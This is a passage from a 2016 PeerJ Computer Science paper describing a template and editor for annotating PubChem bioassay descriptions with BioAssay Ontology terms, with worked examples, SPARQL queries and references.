organism organism Homo sapiens has biological process biological process cell death has biological macromolecule target (not assigned) has mode of action assay mode of action modulation has result result AC50 has unit of measurement result unit of measurement (not assigned) has assay stage assay screening campaign stage primary assay has assay footprint assay footprint 1536 well plate uses assay kit assay kit CellTiter-Glo Luminescent Cell Viability Assay has detection method physical detection method luminescence method uses detection instrument detection instrument (not assigned) has perturbagen perturbagen type compound library Key Annotated with URI Not annotated: missed opportunity Requires more advanced template model Added as literal We have developed a 1536-well cell-based assay for quan�ta�ve high throughput screening (qHTS) against a number of cell lines to determine in vitro cytotoxicity of small molecules. This par�cular assay uses the Hek 293 cell line which is derived from human embryonic kidney cells (transformed with adenovirus). The CellTiter-Glo luminescent cell viability assay (Promega) is a homogeneous method to measure the number of viable cells in culture. The end point readout of this assay is based on quan�ta�on ofintracellular ATP, an indicator of metabolic ac�vity, using the luciferase reac�on. Luciferase catalyzes the oxida�on of beetle Luciferin to oxyluciferin and light in the presence of ATP. The luminescent signal is propor�onal to amount of ATP present. Using the CellTiter-Glo luminescent cell viability assay, the amount of cellular ATP was measured in the Hek293 cell line with complete culture medium following compound treatment for 40 hours. The assay was performed in opaque white Kalypsys 1536-well plates. In the screen, tamoxifen and doxorubicin were used as posi�ve controls. Library compounds were measured for their ability to cause acute toxicity in the cell line, as reflected by a decrease in intracellular ATP levels, in a concentra�on-dependent manner. Data were normalized to the controls for basal ac�vity (DMSO only) and 100% inhibi�on (100 uM tamoxifen). AC50 values were determined from concentra�on-response data modeled with the standard Hill equa�on. (a) (b) Figure 8 First example of PubChem Assay text ideally suited for annotation with the CAT. (A) Text from description in PubChem Assay ID 427: yellow = information captured in CAT, green = information not captured but possible for a future version (e.g., controls, data processing), red = information beyond the scope of BAO (technical details). (B) CAT assignments in BioAssay Schema Editor. Table 1 Representation of CAT in Sample Assay Set. CAT assignment Test assays (of 43) with at least 1 value # Of unique values annotated Bioassay type 43 (100%) 24 of 88 Assay format 43 (100%) 6 of 19 Assay design method 43 (100%) 20 of 76 Assay cell line 24 (55.8%) 15 of 95 Organism 41 (95.3%) 11 of 65 Biological process 40 (93.0%) 28 of 54 Target 32 (74.4%) 13 of 38 Assay mode of action 43 (100%) 8 of 13 Result 41 (100%) 16 of 94 Result unit of measurement 32 (74.4%) 6 of 56 Assay screening campaign stage 40 (93.0%) 8 of 23 Assay footprint 36 (83.7%) 5 of 20 Assay kit 9 (20.9%) 5 of 93 Physical detection method 42 (97.7%) 11 of 51 Detection instrument 26 (60.5%) 9 of 97 Perturbagen type 20 (46.5%) 3 of 9 Clark et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.61 13/24 http://dx.doi.org/10.7717/peerj-cs.61 https://peerj.com/ effort, which is currently constrained to terms defined by the BAO: key parameters such as route of administration, dose, dose units, type of model (e.g. xenograft, disease) are not well represented. These and other limitations will be addressed in the future by adding or extending the underlying ontologies. Finally, as noted earlier, we designed the CAT to be a ‘one-size-fits-most’ template. A summary of assignments for the complete set of assays annotated in the course of developing the CATshows we have achieved this (Table 1). One consequence of this ‘one- size-fits-most’ strategy is that certain attributes (such as those highlighted in green or red in Figs. 8 and 9) have been omitted. Depending on one’s perspective, these types of data (such as positive and negative controls, data processing/normalization steps, relevant disease indication, and specific protocol details such as pre-incubation of compounds with the target, time or temperature of an assay) could be viewed as essential. We decided to exclude this type of information from the CAT because of irregularity of appearance in bioassay descriptions, the lack of coverage by the BAO, or incompatibility with the current data model. Expanding into this area is an opportunity for future development, and it should be noted that the CAT may be used as a starting point for templates that provide a set of assignment options that are customized for subcategories of assays, PubChem Assay (ID 440) Origin: http://pubchem.ncbi.nlm.nih.gov/bioassay/440 has bioassay bioassay type protein-small molecule interaction assay has assay format assay format cell based format has assay design method assay design method fluorescent ligand binding method is cell line of assay cell line U-937 cell has organism organism Homo sapiens has biological process biological process neutrophil activation G-protein coupled receptor signaling pathway has biological macromolecule target "FPR" G protein coupled receptor has mode of action assay mode of action inhibition ligand binding mode of action competitive binding has result result percent inhibition has unit of measurement result unit of measurement percent has assay stage assay screening campaign stage primary assay counter screening assay has assay footprint assay footprint 384 well plate uses assay kit assay kit (not assigned) has detection method physical detection method flow cytometry uses detection instrument detection instrument HyperCyt High Throughput Flow Cytometry System has perturbagen perturbagen type "17K Set Type 1 (17KST1)" MLSMR library "10K Set Type 1 (10KST1)" The assay reported here uses flow cytometry to measure test compound compe��on with a high-affinity fluorescent ligand for binding to human FPR. The assay was performed in a "duplex" format in which U937 cells expressing FPR were tested together with a Rat Basophilic Leukemia (RBL) cell line that expressed the related receptor, FPRL1. The FPR-expressing cells were stained with a red-fluorescent dye, FURA-red, to allow them to be dis�nguished from the FPRL1-expressing cells during flow cytometric analysis. A fluorescein label was conjugated to the lysine residue of the pep�de, WKYMVm (WPep), to produce a fluorescent ligand (WPep-FITC) that bound FPR and FPRL-1 with high affinity. Dissocia�on constants (Kd) for binding of WPep-FITC to FPR and FPRL1 were determined to be 10 nM and 8 nM, respec�vely. WPep-FITC was used as the fluorescent ligand in the duplex FPR-FPRL1 assay to determine compound ac�vity for both receptors. A set of 9,993 compounds, designated the 10K Set Type 1 (10KST1), and a separate set of 16,322 compounds, designated the 17K Set Type 1 (17KST1), was obtained from the Molecular Libraries Small Molecule Repository (MLSMR) maintained by Discovery Partners Interna�onal in conjunc�on with the NIH Molecular Libraries Screening Center Network. There was an overlap of 2,595 compounds common to the two sets so that the total number of unique compounds evaluated in these two sets was 23,720. An addi�onal 586 compounds were cherry picked from the remainder of the MLSMR compound collec�on on the basis of a previously described virtual screening approach for predic�ng FPR ac�vity. The primary high throughput screening (HTS) assay was performed in 384 well format. Test compounds were assessed at a single concentra�on of 6.7 microM for the ability to inhibit fluorescent ligand binding, detected as a decrease in cell fluorescence due to displacement of fluorescent ligand from FPR. The FPRL1 primary HTS assay results obtained in parallel in the same wells have been reported separately (AID 441) and represent counter-screen data with which to determine selec�vity and specificity of compounds with FPR binding ac�vity iden�fied in this report. Likewise, FPR binding results reported here represent counter-screen data with which to determine the selec�vity and specificity of compounds iden�fied to have FPRL1 binding ac�vity in the FPRL1 primary HTS assay report (AID 441) For assay performance, addi�ons to wells were in sequence as follows: 1) test compounds and control reagents (5 microL/well); 2) a combina�on of FPR- and FPRL1-expressing cell lines (10^7/mL each, 5 microL/well); 3) (a�er 30 min, 4 degrees C incuba�on) fluorescent pep�de (5 microL/well). A�er an addi�onal 45 min, 4 degrees C incuba�on, plates were immediately analyzed by flow cytometry. The assay response range was defined by replicate control wells containing unlabeled receptor-blocking pep�de (posi�ve control) or buffer (nega�ve control). fMLFF (4Pep) was used as the FPR-blocking pep�de, unlabeled WPep as the FPRL1-blocking pep�de. The assay was homogeneous in that cells, compounds and fluorescent pep�de were added in sequence and the wells subsequently analyzed without intervening wash steps. The HyperCyt high throughpu�low cytometry pla�orm was used to sequen�ally sample cells from wells of 384-well microplates (2 microL/sample) for flow cytometer presenta�on at a rate of 40 samples/min. The resul�ng �me-resolved data files were analyzed with IDLeQuery so�ware to determine compound ac�vity in each well. (a) (b) Figure 9 Second example of PubChem Assay text ideally suited for annotation with the CAT. (A) Text from description in PubChem Assay ID 440: yellow = information captured in CAT, pink = information added as ‘literal’ values (i.e., too specific to exist as a BAO entry, but deemed valuable), green = information not captured but possible for a future version (e.g., controls, data processing), red= information beyond the scope of BAO (technical details). (B) CATassignments in BioAssay Schema Editor. Annotations added as ‘literal’ values are highlighted yellow and contained in single quotes. Note that multiple values for a single CAT assignment can be annotated (target biological process, assay mode of action, assay screening campaign stage, perturbagen type). Clark et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.61 14/24 http://dx.doi.org/10.7717/peerj-cs.61 https://peerj.com/ or even specific projects. We believe the next immediate step should be to apply our CAT to a large (> 10,000) set of assays, both to facilitate new meta-analyses and to identify potential gaps in annotation revealed by such studies. PubChem Possibly the most voluminous source of openly accessible bioassay data can be found on PubChem, which hosts more than 1.1 million assay records at the time of publication, and is growing rapidly. These are individually associated with the chemical structures of the compounds for which the measurements were made. Each of the assays is decorated PubChem Assay (ID 488847) Origin: https://pubchem.ncbi.nlm.nih.gov/bioassay/488847 has bioassay bioassay type protein-RNA interaction assay protein-small molecule interaction assay has assay format assay format biochemical format has assay design method assay design method binding assessment method is cell line of assay cell line (not assigned) has organism organism Homo sapiens has biological process biological process G-protein coupled receptor signaling pathway has biological macromolecule target kinase "GRK2" has mode of action assay mode of action competitive binding has result result percent response has unit of measurement result unit of measurement percent has assay stage assay screening campaign stage primary assay has assay footprint assay footprint 384 well plate uses assay kit assay kit (not assigned) has detection method physical detection method flow cytometry uses detection instrument detection instrument CyAn Flow Cytometer has perturbagen perturbagen type compound library Assay Background and Significance: A small family of G protein-coupled receptor (GPCR) kinases (GRKs) nega�vely regulates heterotrimeric G protein signaling by phosphoryla�ng mul�ple sites in the cytoplasmic loops and tails of ac�vated GPCRs [Krupnick, et al. 1998]. Through this process, cells adapt to persistent s�muli that act at GPCRs and protect themselves from damage incurred by sustained signaling. GRKs can also play maladap�ve roles in human disease. GRK2 is overexpressed during heart failure, which not only uncouples cardiac receptors from the central nervous system, but also promotes the release of excessive amounts of catecholamines from the adrenal gland [Vatner, et al 1996]. Inhibi�on of GRK2 by transgenic pep�des prevents cardiac failure in mouse models [Rockman, et al. 1998], sugges�ng that GRK2 is an excellent target for the treatment of heart disease. However, selec�ve small molecule inhibitors of GRKs have not been reported, perhaps due to high homology among the ac�ve sites of GRKs and other AGC kinases. Over the last six years, our lab has made significant progress in understanding the structure and func�on of GRKs, and we are currently inves�ga�ng the molecular basis for the selec�ve inhibi�on of GRK2 by a high affinity RNA aptamer [Tse and Boger, 2005]. Preliminary crystallographic studies of this complex demonstrate that the aptamer binds primarily to the large lobe of the kinase domain, where it blocks the entrance to the nucleo�de binding site of the kinase domain. In the HTS assay reported here, an RNA aptamer is used in a displacement assay to iden�fy small molecules that bind to regions on GRK2 outside of its ac�ve site that are also cri�cal for ac�vity. This is a robust flow cytometry protein interac�on assay to screen for compounds that compete with RNA binding to GRK2. Using ac�vity-based secondary screens, we will confirm which hits derived from HTS campaigns exhibit direct binding to GRK2 and inhibit kinase ac�vity. These compounds will be further characterized to establish membrane permeability, their mode of inhibi�on, and their selec�vity for GRK2. Although all ac�ve molecules are of interest, small molecules that do not exhibit compe��ve inhibi�on with ATP are of par�cular importance because they would likely represent novel and selec�ve therapeu�c leads for the treatment of heart disease. GRK2 protein is bio�nylated using bio�namidohexanoic acid N-hydroxysuccinimide ester(Sigma). The RNA aptamer is fluorescently labeled on the 3'end with carboxyfluorescein (synthesized and labeled byIDT). Streptavidin-coated beads (Spherotech) are incubated with bio�nylated GRK2 (bGRK2) at a final concentra�on of 2 nM for 30 minutes. The BioTek Microflow liquid dispenser is used to dispense 4 microL of assay buffer to all but column 1 of a 384-well assay plate. The posi�ve (blocked) control containing 50X unlabeled RNA aptamer in assay buffer is dispensed to column 1 by a Microflow liquid dispenser (BiotTek, USA). Compounds (10 microM in-well concentra�on) are transferred to assay wells via 100 nanoL pintool transfer on the Biomek FX liquid dispenser (Beckman Coulter, USA. A total of 3 microL of bead suspension is dispensed into assay wells using the Nanoquot liquid dispenser (BioTek, USA). Plates are incubated at RT for 30 min. 3 microL FAM-C13.28 aptamer (final concentra�on 2 nanoM, supplied by the assay provider) is added to assay wells using the Microflow liquid dispenser. The reac�on is incubated for one hour at RT. In this flow cytometry-based HTS [Kuckuck, et al. 2001] a CyAn flow cytometer (Dako / Beckman Coulter) interfaced with a HyperCyt (IntelliCyt, USA) auto-sampler is used to measure the median fluorescence intensity associated with bead-bound bGRK2. Calcula�on: For plates that passed the Z' test (Z'>.30) a compound was considered ac�ve if the PERCENT_RESPONSE > .40. The Z' mean for all the plates was 0.8 with a standard devia�on of 0.2. The 40% cutoff corresponds to about three �mes the standard devia�on of PERCENT_RESPONSE from 'non- fluorescent' test compounds. Nega�ve PERCENT_RESPONSE is primarily due to test compounds with innate fluorescence. PUBCHEM_ACTIVITY_SCORE = PERCENT_RESPONSE PUBCHEM_ACTIVITY_OUTCOME = 2 (or ACTIVE) if PUBCHEM_ACTIVITY_SCORE > 40, otherwise the PUBCHEM_ACTIVITY_OUTCOME = 1 (or INACTIVE). (a) (b) Figure 10 Example of an assay partially suited for annotation with the CAT. (A) Text from description in PubChem Assay ID 488847: yellow = information captured in CAT, pink= information added as ‘literal’ values (i.e., too specific to exist as a BAO entry, but deemed valuable), green = information not captured but possible for a future version (e.g., controls, labels of target and ligand, assay quality data (Z′)), red = information beyond the scope of BAO (technical details). (B) CAT values assigned in the BioAssay Schema Editor capture key parameters of the assay yet do not capture the complexity of the assay articulated in the single sentence (arrow): “a flow cytometry protein interaction assay to screen for compounds that compete with RNA binding to GRK2.” Clark et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.61 15/24 http://dx.doi.org/10.7717/peerj-cs.61 https://peerj.com/ with several descriptive fields that are essentially plain text, and which are populated by contributors during the upload process, or in some cases by an import script transferring data from other sources. While many of the entries contain a significant amount of detail, the phrasing style and level of detail varies considerably, often erring on the side of too little or too much information about the assay protocol. Nonetheless, the PubChem assay collection represents one of the best and most convenient sources of data for annotation purposes, and for this reason we have added a feature to the BATeditor that explicitly searches for PubChem records, as shown in Fig. 11. The dialog box allows the user to type in a PubChem Assay ID number, or to hit the button labelled Random, which picks an arbitrary assay from the entire collection, and fills in the corresponding text and URI of origin. While a large proportion of assays loaded into PubChem contain only sparse tags about the data source, or the abstract of the corresponding publication, there are a significant number of records that contain lengthy descriptions of the assay. The dialog box provides an opportunity for the user to tidy up the text (e.g. removing irrelevant content) prior to importing it into the schema. The content is then added to the list of assays being annotated within the schema model, whereby the origin is recorded as a link to the assay, and the text is associated using the hasParagraph predicate. Once the text is augmented with annotations using the current template, it becomes a useful entry for training data. This is one of our main strategies for generating a corpus of data for machine-learning purposes, which will ultimately find its way into a user friendly ELN for bioassay annotation. Analysis Because the data model we describe is based on semantic web triples, and the file format that is used by the BioAssay Schema Editor is made up of triples (in Turtle format), it means that any templates and assay annotations can be loaded directly into a triple store database, and queried using SPARQL queries. Content can be hosted on private servers for local use, or it can be exposed to the greater web of connected data. Supplementary Information 1 describes a configuration script for the open source Apache Fuseki Jena server which can be used to load the BAO, its related ontologies, and some number of files saved with the BioAssay Schema Editor, which can then be served up as read-only content. Once the content is available via a SPARQL endpoint, there are a number of boilerplate queries that can be used to extract summary and specific information. Fetching a list of all bioassay templates can be accomplished using the following query: PREFIX bat: <http://www.bioassayontology.org/bat#> PREFIX rdfs: <http://www.w3.org/2000/01/rdf-schema#> SELECT ?template ?label ?descr WHERE { ?template a bat:BioAssayTemplate ; rdfs:label ?label . OPTIONAL {?template bat:hasDescription ?descr .} } Clark et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.61 16/24 http://dx.doi.org/10.7717/peerj-cs.61/supp-1 http://dx.doi.org/10.7717/peerj-cs.61 https://peerj.com/ The above query identifies any resource that is tagged as having the BAT type. Obtaining information about the assignments that are associated with a template can be done by looking for resources of type Group that are associated with it. Obtaining Figure 11 Dialog box for random lookup of assays from PubChem. Clark et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.61 17/24 http://dx.doi.org/10.7717/peerj-cs.61 https://peerj.com/ a summary list of assignments that are attached to the top level (i.e. not within a subgroup) can be accomplished with a query similar to the following (using the same prefixes as above) which explicitly references the CAT: SELECT ?assn ?label ?descr ?property ?numValues { <http://www.bioassayontology.org/bas#CommonAssayTemplate> bat:hasAssignment ?assn . ?assn a bat:Assignment ; rdfs:label ?label ; bat:hasProperty ?property . OPTIONAL {?assn bat:hasDescription ?descr .} { SELECT ?assn (COUNT(?value) as ?numValues) WHERE { ?assn bat:hasValue ?value . } GROUP BY ?assn } } ORDER BY ?label Similarly, assignments with one level of nesting can be obtained with a slightly longer query, which explicitly inserts a subgroup in between the template and assignment: SELECT ?group ?glabel ?assn ?label ?descr ?property ?numValues { <http://www.bioassayontology.org/bas#CommonAssayTemplate> bat:hasGroup ?group . ?group a bat:Group ; rdfs:label ?glabel ; bat:hasAssignment ?assn . ?assn a bat:Assignment ; rdfs:label ?label ; bat:hasProperty ?property . { SELECT ?assn (COUNT(?value) as ?numValues) WHERE { ?assn bat :hasValue ?value . } GROUP BY ?assn } } ORDER BY ?glabel ?label Clark et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.61 18/24 http://dx.doi.org/10.7717/peerj-cs.61 https://peerj.com/ To query for information about the prescribed values for assignment (in this case the bioassay assignment from the CAT), the following query can be used: SELECT ?property ?value ?label { <http://www.bioassayontology.org/bas#Bioassay> bat:hasProperty ?property ; bat:hasValue [ bat:mapsTo ?value ; rdfs:label ?label ] . } The query specifically pulls out the property field, which is typically a link into the BAO property terms, and the value field, which is typically a link into the BAO classes. Pursuing either of these resources provides a wealth of implicit information, partly from the hierarchical nature of the BAO terms, and the unlimited opportunities for these terms to be linked to other semantic resources. To obtain a list of assays that have been annotated using one of the templates, the following query can be used: SELECT ?assay ?label ?descr ?template WHERE { ?assay a bat:BioAssayDescription ; rdfs:label ?label ; bat:usesTemplate ?template . OPTIONAL {?assay bat:hasDescription ?descr .} } Obtaining all of the annotations for such an assay can be done with: SELECT ?assn ?label ?property ?value ?literal ?group WHERE { <http://www.bioassayontology.org/bas#ExampleAssay> bat:hasAnnotation ?annot . ?annot bat:isAssignment ?assn ; rdfs:label ?label ; bat:hasProperty ?property . OPTIONAL {?annot bat:hasValue ?value} OPTIONAL {?annot bat:hasLiteral ?literal} ?group a bat:Group ; bat:hasAssignment ?assn . } Clark et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.61 19/24 http://dx.doi.org/10.7717/peerj-cs.61 https://peerj.com/ Because annotations are directly attached to an assay description, hierarchical information about the nature of the assignment can be obtained by further investigating the template definition of the assignment (?assn) or either of the linked BAO terms (?property and ?value). CONCLUSION We have developed a data model and interactive tool that can be used to narrow the degrees of freedom from the BAO and its linked dependencies. This has been done in order to facilitate content creation activities, so that semantic annotation of assay protocols can be carried out by a domain expert with no corresponding expertise with the underlying ontology. We have provided a proof of concept tool that creates a user interface based on the template data model, and made this available to the community as open source. The data model that we have created follows a simplistic pattern, where elementary facts can be asserted. By leveraging the implied value of the underlying ontology, a small collection of a dozen or so such annotations provides a significant amount of machine-readable context about the assay. While insufficient to completely define an assay protocol experiment, this stands in contrast to the standard practice of providing essentially zero machine-readable information (i.e. plain English text with quasi-standardized jargon). We have made available the CAT which was designed by biologists with the objective of leveraging the BAO to provide the largest amount of useful, relevant, machine-readable information with the fewest number of additional data points needing to be captured by the originating scientist. The CAT is expected to be useful for a wide variety of sorting, filtering, and data aggregating tasks that drug discovery scientists need to be able to carry out on a large scale, but currently cannot due to the absence of machine- readable annotations. The CAT prioritizes 16 assignments that biologists consider most central to describing their assays and reporting assay results. Annotations for these assignments will enable biologists to ask complex queries. For example, one could ask if there are systematic differences in cell-based versus biochemical-based assays for a certain target class, such as kinases. One could determine if a certain assay set-up, such as 96-well plates using a spectrophotometer were likely to have a higher hit rate. Similarly, one could identify if a certain compound or class of compounds is active in multiple assays, and if those assays assess similar biological processes or if the activity is likely to be an artifact. By focusing on 16 assignments out of more than a hundred options available in the BAO, the CAT is meant to impose a minimal burden for annotating scientists. Our goal is to make annotating assays simple and easy so that the practice may be generally adopted. Templates are malleable and scientists can easily include other assignments. One critical type of information that is not included in the current framework is protocol steps, which would be essential for directly comparing two assays. In the future, it would be useful if this information were machine-readable. However, semantic technology using a simplistic data model like the BAT cannot capture sequences of information. Capturing procedural or protocol steps would require the development of a Clark et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.61 20/24 https://peerj.com/ http://dx.doi.org/10.7717/peerj-cs.61 more complex data model. Under the current system, we imagine that queries using annotations from the CAT will allow scientists to hone in on similar assays, but for the moment, experts will still need to read the full assay descriptions to make decisions about combining different assays’ data sets. We have carried out this work in the context of a much larger scope, which is to provide scientists with tools to easily annotate bioassays and other related experiments in a way that is complete and machine-readable. Given that the standard industry practice does not involve adding any machine readable data to assay protocols, and that there are currently no widely available tools to do so with a user experience that is sufficiently painless for mass adoption, we have taken an incremental approach. This additional work has been done in order that we can continue with our previous work that was focused on using machine learning techniques to accelerate manual assignment of assays (Williams et al., 2012). Our immediate follow-up goals are to make use of the CAT to gather a large corpus of training data, both from active users of CDD Vault, and from existing repositories such as PubChem. This training data will be used to ensure that our enterprise ELN tools will be supported by machine learning technology as soon as they are unveiled. We are also pursuing options for extending the BAT data model so that it is capable of capturing more sophisticated information about assays, e.g. linking to other ontologies to cover more types of assays; adding terminology for capturing quantities; addition of indefinite numbers of preparation steps; dependent assignment types, etc. One critical step when we enable connecting with other ontologies will be the ability to link the ‘Target’ to a unique identifier such as geneid or UniProtID. Each unique target identifier can be associated with a rich array of corresponding GO terms, of which a subset are mapped into the default selection of BAO classes. This will enable comparison of assays based on specific targets and related biological processes or molecular functions. While our first objective is horizontal scaling, i.e. ensuring that all assay protocols have semantic annotations that make a large portion of the content machine-readable, pursuing vertical scaling is also of great interest, i.e. making it possible for the semantic annotations to replace the need for use of English text (Soldatova et al., 2014). This brings about some exciting possibilities beyond just improvement of searching and matching, such as uploading protocols to robotic assay machinery, or making the publication process multi-lingual, thus alleviating a considerable burden to non-native English speakers. Pursuing this goal will require significant additions to the BAO itself, as well as making increased use of borrowed terms from other ontologies. The technology that we have described in this article has been created for the purpose of improving the electronic lab notebook (ELN) technology that is offered by Collaborative Drug Discovery, Inc. (CDD), and we have begun work on a web- based interface for using templates such as the CAT for annotating assay protocols. 9 We have disclosed all of the underlying methods, data and open source code because we welcome participation by anyone and everyone. While CDD is a privately held for-profit company, it is our firm belief that improvement to this particular aspect of scientific research is a positive sum game, and we have more to gain by sharing than by keeping our technology entirely proprietary. Clark et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.61 21/24 9 A preliminary version of the web inter- face can be found at http:// bioassayexpress.com. At the time of writing this service is in an early pre- alpha phase, but will be updated as the project progresses. Clark et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.61 21/24 http://dx.doi.org/10.7717/peerj-cs.61 http://bioassayexpress.com http://bioassayexpress.com https://peerj.com/ http://dx.doi.org/10.7717/peerj-cs.61 SUPPORTING MATERIALS The BioAssay Schema Editor is publicly available from GitHub (https://github.com/cdd/ bioassay-template). The source code for the application is available under the terms of the Gnu Public License (GPL) v2, which requires that derived works must also be similarly open. The underlying semantic data model for the template and assay annotation, as well as the CAT, are public domain: they are not copyrighted, and no restrictions are placed on their use. The BAO is available from the corresponding site (http://bioassayontology.org/bioassayontology) under the Creative Commons Attribution License v3. ADDITIONAL INFORMATION AND DECLARATIONS Funding This work was funded in part from the NIH NCATS Phase 2 SBIR Grant # 2R44TR000185-02 “Simplifying Encoding of Bioassays to Accelerate Drug Discovery” as described on https://projectreporter.nih.gov/reporter.cfm. The funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. Grant Disclosures The following grant information was disclosed by the authors: NIH NCATS Phase 2 SBIR: 2R44TR000185-02. Competing Interests All authors are employees of Collaborative Drug Discovery, Inc. Author Contributions � Alex M. Clark conceived and designed the experiments, performed the experiments, contributed reagents/materials/analysis tools, wrote the paper, prepared figures and/or tables, performed the computation work, reviewed drafts of the paper. � Nadia K. Litterman conceived and designed the experiments, analyzed the data, contributed reagents/materials/analysis tools, wrote the paper, prepared figures and/or tables, reviewed drafts of the paper. � Janice E. Kranz conceived and designed the experiments, analyzed the data, contributed reagents/materials/analysis tools, wrote the paper, prepared figures and/or tables, reviewed drafts of the paper. � Peter Gund analyzed the data, contributed reagents/materials/analysis tools, wrote the paper, reviewed drafts of the paper. � Kellan Gregory contributed reagents/materials/analysis tools, wrote the paper, reviewed drafts of the paper. � Barry A. Bunin contributed reagents/materials/analysis tools, wrote the paper, reviewed drafts of the paper. Clark et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.61 22/24 https://github.com/cdd/bioassay-template https://github.com/cdd/bioassay-template http://bioassayontology.org/bioassayontology https://peerj.com/ http://dx.doi.org/10.7717/peerj-cs.61 Data Deposition The following information was supplied regarding data availability: GitHub: https://github.com/cdd/bioassay-template. Supplemental Information Supplemental information for this article can be found online at http://dx.doi.org/ 10.7717/peerj-cs.61#supplemental-information. REFERENCES Abeyruwan S, Vempati UD, Küçük H, Visser U, Koleti A, Mir A, Sakurai K, Chung C, Bittker J, Clemons P, Brudz S, Siripala A, Morales A, Romacker M, Twomey D, Bureeva S, Lemmon V, Schürer SC. 2014. Evolving BioAssay Ontology (BAO): modularization, integration and applications. Journal of Biomedical Semantics 5(1):S5 DOI 10.1186/2041-1480-5-S1-S5. Bolton E. 2015. Reporting biological assay screening results for maximum impact. Drug Discovery Today: Technologies 14:31–36 DOI 10.1016/j.ddtec.2015.03.004. Clark AM, Bunin BA, Litterman NK, Schürer SC, Visser U. 2014. Fast and accurate semantic annotation of bioassays exploiting a hybrid of machine learning and user confirmation. PeerJ 2:e524 DOI 10.7717/peerj.524. Clark AM, Williams AJ, Ekins S. 2015. Machines first, humans second: on the importance of algorithmic interpretation of open chemistry data. Journal of Cheminformatics 7(1):9 DOI 10.1186/s13321-015-0057-7. de Souza A, Bittker JA, Lahr DL, Brudz S, Chatwin S, Oprea TI, Waller A, Yang JJ, Southall N, Guha R, Schürer SC, Vempati UD, Southern MR, Dawson ES, Clemons PA, Chung TDY. 2014. An overview of the challenges in designing, integrating, and delivering BARD: a public chemical-biology resource and query portal for multiple organizations, locations, and disciplines. Journal of Biomedical Screening 19(5):614–627 DOI 10.1177/1087057113517139. Ecker GF, Williams-Jones B. 2012. Editorial: open innovation in drug discovery. Molecular Informatics 31(8):519–520 DOI 10.1002/minf.201280004. Gaulton A, Bellis LJ, Bento AP, Chambers J, Davies M, Hersey A, Light Y, McGlinchey S, Michalovich D, Al-Lazikani B, Overington JP. 2012. ChEMBL: a large-scale bioactivity database for drug discovery. Nucleic Acids Research 40(Database Issue):D1100–D1107 DOI 10.1093/nar/gkr777. Helal KY, Maciejewski M, Gregori-Puigjane E, Glick M, Wassermann AM. 2016. Public domain HTS fingerprints: design and evaluation of compound bioactivity profiles from PubChem’s bioassay repository. Journal of Chemical Information and Modeling 56(2):390–398 DOI 10.1021/acs.jcim.5b00498. Hersey A, Senger S, Overington JP. 2012. Open data for drug discovery: learning from the biological community. Future Medicinal Chemistry 4(15):1865–1867 DOI 10.4155/fmc.12.159. Kim S, Thiessen PA, Bolton EE, Chen J, Fu G, Gindulyte A, Han L, He J, He S, Shoemaker BA, Wang J, Yu B, Zhang J, Bryant SH. 2016. PubChem substance and compound databases. Nucleic Acids Research 44(D1):D1202–D1213 DOI 10.1093/nar/gkv951. Schürer SC, Vempati U, Smith R, Southern M, Lemmon V. 2011. BioAssay ontology annotations facilitate cross-analysis of diverse high-throughput screening data sets. Journal of Biomolecular Screening 16(4):415–426 DOI 10.1177/1087057111400191. Clark et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.61 23/24 https://github.com/cdd/bioassay-template http://dx.doi.org/10.7717/peerj-cs.61#supplementalnformation http://dx.doi.org/10.7717/peerj-cs.61#supplementalnformation http://dx.doi.org/10.1186/2041-1480-5-S1-S5 http://dx.doi.org/10.1016/j.ddtec.2015.03.004 http://dx.doi.org/10.7717/peerj.524 http://dx.doi.org/10.1186/s13321-015-0057-7 http://dx.doi.org/10.1177/1087057113517139 http://dx.doi.org/10.1002/minf.201280004 http://dx.doi.org/10.1093/nar/gkr777 http://dx.doi.org/10.1021/acs.jcim.5b00498 http://dx.doi.org/10.4155/fmc.12.159 http://dx.doi.org/10.1093/nar/gkv951 http://dx.doi.org/10.1177/1087057111400191 https://peerj.com/ http://dx.doi.org/10.7717/peerj-cs.61 Soldatova LN, Nadis D, King RD, Basu PS, Haddi E, Baumié V, Saunders NJ, Marwan W, Rudkin BB. 2014. EXACT2: the semantics of biomedical protocols. BMC Bioinformatics 15(Suppl 14):S5 DOI 10.1186/1471-2105-15-S14-S5. The Gene Ontology Consortium. 2015. Gene Ontology Consortium: going forward. Nucleic Acids Research 43(Database issue):D1049–D1056. Vempati UD, Przydzial MJ, Chung C, Abeyruwan S, Mir A, Sakurai K, Visser U, Lemmon VP, Schürer SC. 2012. Formalization, annotation and analysis of diverse drug and probe screening assay datasets using the BioAssay Ontology (BAO). PLoS ONE 7(11):e49198 DOI 10.1371/journal.pone.0049198. Wang Y, Suzek T, Zhang J, Wang J, He S, Cheng T, Shoemaker BA, Gindulyte A, Bryant SH. 2014. PubChem BioAssay: 2014 update. Nucleic Acids Research 42(Database Issue): D1075–D1082 DOI 10.1093/nar/gkt978. Williams AJ, Harland L, Groth P, Pettifer S, Chichester C, Willighagen EL, Evelo CT, Blomberg N, Ecker G, Goble C, Mons B. 2012. Open PHACTS: semantic interoperability for drug discovery. Drug Discovery Today 17(21–22):1188–1198 DOI 10.1016/j.drudis.2012.05.016. Williams AJ, Wilbanks J, Ekins S. 2012. Why open drug discovery needs four simple rules for licensing data and models. PLoS Computational Biology 8(9):e1002706 DOI 10.1371/journal.pcbi.1002706. Willighagen EL, Waagmeester A, Spjuth O, Ansell P, Williams AJ, Tkachenko V, Hastings J, Chen B, Wild DJ. 2013. The ChEMBL database as linked open data. Journal of Cheminformatics 5(1):23 DOI 10.1186/1758-2946-5-23. Clark et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.61 24/24 http://dx.doi.org/10.1186/1471-2105-15-S14-S5 http://dx.doi.org/10.1371/journal.pone.0049198 http://dx.doi.org/10.1093/nar/gkt978 http://dx.doi.org/10.1016/j.drudis.2012.05.016 